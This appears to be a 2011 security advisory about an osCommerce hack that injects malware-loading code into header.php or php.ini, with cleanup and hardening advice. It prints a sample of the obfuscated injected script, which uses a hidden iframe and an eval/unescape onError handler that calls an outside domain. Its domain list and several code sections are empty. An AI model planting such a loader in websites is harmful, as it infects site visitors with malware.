osCommerce Malware Hack

Updated: March 28, 2011

The osCommerce malware hack utilizes a vulnerability in osCommerce to place code into website that causes them to distribute malware. In most cases code is placed at the bottom of the /includes/header.php file and in some cases may also be in the /admin/includes/header.php file. In other cases a php.ini is modified with an auto_append_file= line which causes php files to be appended with another file added by the hacker. The first time a user accesses the website the code places a malware script on the page. Some of the domains the malware script has called a file from are,,,,,,,,,,,,,,,,,,,,,,,,,,

To clean the website, the website needs to be reverted to a clean backup or the hack code need to be removed from the header.php and any backdoor scripts added to the website need to be removed (our Basic Backdoor Script Finder will find some of the most popular backdoor scripts).

For osCommerce 2.2, the best way to prevent the vulnerabilities from being exploited is by renaming and password protecting the admin directory. osCommerce 2.3 does not contain the vulnerabilites, but it is still recommend to rename and password protect the admin directory.

Recent Script Format On Web Pages:

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="10101010" height="1" width="1"><img src="about:blank" onError='astro=unescape("%27");astru=unescape("%22");sksa=eval("document.getElementById("+astro+"seaid"+astro+").src=unescape("+astro+"%68%74%74%70%3A%2F%2F"+astro+")+document.getElementById("+astro+"10101010"+astro+").id+unescape("+astro+"%2E%69%6E%2F"+astro+")+"+astro+"1287163664"+astro+"+unescape("+astro+"%2E%70%68%70"+astro+")");document.getElementById("seaid").src=sksa' style="width:300;height:300;border:0px;"><iframe id="seaid" src="about:blank"></iframe></div> version of code added to header.php: version of code added to header.php: version of code added to header.php: